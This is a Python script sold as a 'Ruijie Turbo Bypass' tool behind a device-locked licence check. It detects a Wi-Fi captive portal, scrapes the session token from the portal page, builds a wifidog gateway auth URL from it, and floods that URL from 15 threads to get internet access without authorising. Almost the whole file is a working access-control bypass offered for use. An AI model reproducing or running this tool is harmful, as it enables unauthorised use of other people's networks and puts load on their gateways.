import requests
import re
import urllib3
import time
import threading
import os
import sys
import subprocess
import random
from datetime import datetime
from urllib.parse import urlparse, parse_qs

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# ===============================
# PREMIUM COLORS & CONFIG
# ===============================
R = "\033[91m" 
G = "\033[92m" 
C = "\033[96m" 
Y = "\033[93m" 
M = "\033[95m" 
W = "\033[97m" 
X = "\033[0m"

LICENSE_PATH = os.path.expanduser("~/.approved_devices.db")
STOP_EVENT = threading.Event()
PING_THREADS = 15  # Speed ကို မြှင့်တင်ထားသည်

# ===============================
# UNIQUE ID SYSTEM (တစ်ယောက်နဲ့တစ်ယောက် မတူအောင်)
# ===============================
def get_hwid():
    try:
        # ဖုန်း Model ယူခြင်း
        model = subprocess.check_output('getprop ro.product.model', shell=True).decode().strip().replace(" ", "")
        # Android ID ယူခြင်း
        android_id = subprocess.check_output('settings get secure android_id', shell=True).decode().strip()
        # Hash လုပ်ပြီး ပိုထူးခြားအောင် လုပ်ခြင်း
        unique_hash = str(abs(hash(model + android_id)))[:4]
        
        # Format: PREMIUM-MODEL-ANDROIDID-HASH
        return f"PREMIUM-{model[:4].upper()}-{android_id[:6].upper()}-{unique_hash}"
    except:
        return f"PREMIUM-UNKNOWN-{random.randint(1000, 9999)}"

def check_approval():
    os.system('clear')
    my_id = get_hwid()
    current_date = datetime.now().date()
    
    if not os.path.exists(LICENSE_PATH):
        with open(LICENSE_PATH, "w") as f: f.write("")

    found = False
    is_expired = False
    expiry_date_str = ""

    with open(LICENSE_PATH, "r") as f:
        lines = f.readlines()
        for line in lines:
            if "|" in line:
                stored_id, date_str = line.strip().split("|")
                if stored_id == my_id:
                    found = True
                    expiry_date_str = date_str
                    try:
                        expiry_date = datetime.strptime(date_str, "%Y-%m-%d").date()
                        if current_date > expiry_date:
                            is_expired = True
                    except:
                        is_expired = True 
                    break

    print(f"{M}╔══════════════════════════════════════════════════════╗")
    print(f"║          {W}PREMIUM SECURITY (OFFLINE MODE){M}             ║")
    print(f"╚══════════════════════════════════════════════════════╝{X}")
    print(f"{C}[*] SYSTEM ID : {Y}{my_id}{X}")
    print(f"{M}──────────────────────────────────────────────────────{X}")

    if not found:
        print(f"{R}[×] ACCESS DENIED!{X}")
        print(f"{W}[!] Your device is not registered.{X}")
        print(f"{W}[!] Send ID to Admin to Activate.{X}")
        print(f"{M}──────────────────────────────────────────────────────{X}")
        sys.exit()
    
    if is_expired:
        print(f"{R}[×] LICENSE EXPIRED!{X}")
        print(f"{W}[!] Your access ended on: {R}{expiry_date_str}{X}")
        print(f"{W}[!] Please contact Admin for renewal.{X}")
        print(f"{M}──────────────────────────────────────────────────────{X}")
        sys.exit()

    print(f"{G}[✓] ACCESS GRANTED!{X}")
    print(f"{C}[i] License Valid Until: {G}{expiry_date_str}{X}")
    time.sleep(2)
    return True

# ===============================
# TURBO BYPASS ENGINE
# ===============================
def banner():
    os.system('clear')
    print(f"""{C}
    ██████╗ ██╗   ██╗██████╗  █████╗ ███████╗███████╗
    ██╔══██╗╚██╗ ██╔╝██╔══██╗██╔══██╗██╔════╝██╔════╝
    ██████╔╝ ╚████╔╝ ██████╔╝███████║███████╗███████╗
    ██╔══██╗  ╚██╔╝  ██╔═══╝ ██╔══██║╚════██║╚════██║
    ██████╔╝   ██║   ██║     ██║  ██║███████║███████║
    ╚═════╝    ╚═╝   ╚═╝     ╚═╝  ╚═╝╚══════╝╚══════╝
           {W}RUIJIE TURBO BYPASS {M}[PREMIUM EDITION]{X}
    """)

def high_speed_ping(auth_link, sid):
    session = requests.Session()
    while not STOP_EVENT.is_set():
        try:
            session.get(auth_link, timeout=5)
            status_color = random.choice([G, C, M])
            print(f"{status_color}[✓]{X} SID: {Y}{sid[:10]}... {G}Pulse Sending{X}      ", end="\r")
        except:
            break
        time.sleep(0.05)

def start_process():
    banner()
    print(f"{C}[*] Initializing Turbo Engine...{X}")

    while not STOP_EVENT.is_set():
        session = requests.Session()
        try:
            # Check for Portal
            test = requests.get("http://connectivitycheck.gstatic.com/generate_204", timeout=5, allow_redirects=True)
            
            if test.status_code == 204 and test.url.endswith("generate_204"):
                print(f"{Y}[-] Internet Already Active. Monitoring...{X}", end="\r")
                time.sleep(5)
                continue

            portal_url = test.url
            print(f"\n{G}[!] Portal Detected: {W}{urlparse(portal_url).netloc}{X}")

            res = session.get(portal_url, verify=False, timeout=10)
            sid = None
            
            # ပိုမိုကျယ်ပြန့်သော SID ရှာဖွေမှု (sessionId, sid, token, auth_token)
            search_patterns = [
                r'(?i)(?:sessionid|sid|token|auth_token)=([a-zA-Z0-9_-]+)',
                r'\"sessionId\":\"([a-zA-Z0-9_-]+)\"',
                r'\'sid\':\'([a-zA-Z0-9_-]+)\''
            ]

            # URL ထဲမှာ ရှာမယ်
            for pattern in search_patterns:
                match = re.search(pattern, res.url)
                if match:
                    sid = match.group(1)
                    break
            
            # HTML ထဲမှာ ထပ်ရှာမယ်
            if not sid:
                for pattern in search_patterns:
                    match = re.search(pattern, res.text)
                    if match:
                        sid = match.group(1)
                        break

            if not sid:
                print(f"{R}[×] SID not found. Retrying... (Check WiFi Login Page){X}")
                time.sleep(5)
                continue

            print(f"{G}[✓] Captured SID: {W}{sid}{X}")

            parsed_p = urlparse(portal_url)
            params = parse_qs(parsed_p.query)
            gw_addr = params.get('gw_address', ['192.168.60.1'])[0]
            gw_port = params.get('gw_port', ['2060'])[0]
            auth_link = f"http://{gw_addr}:{gw_port}/wifidog/auth?token={sid}"

            print(f"{M}[*] Launching {PING_THREADS} Turbo Threads...{X}")
            for _ in range(PING_THREADS):
                threading.Thread(target=high_speed_ping, args=(auth_link, sid), daemon=True).start()

            while True:
                try:
                    check = requests.get("http://www.google.com", timeout=5)
                    if check.status_code != 200: break
                except: break
                time.sleep(10)

        except Exception as e:
            time.sleep(5)

if __name__ == "__main__":
    if check_approval():
        try:
            start_process()
        except KeyboardInterrupt:
            STOP_EVENT.set()
            print(f"\n{R}[!] Stopped.{X}")
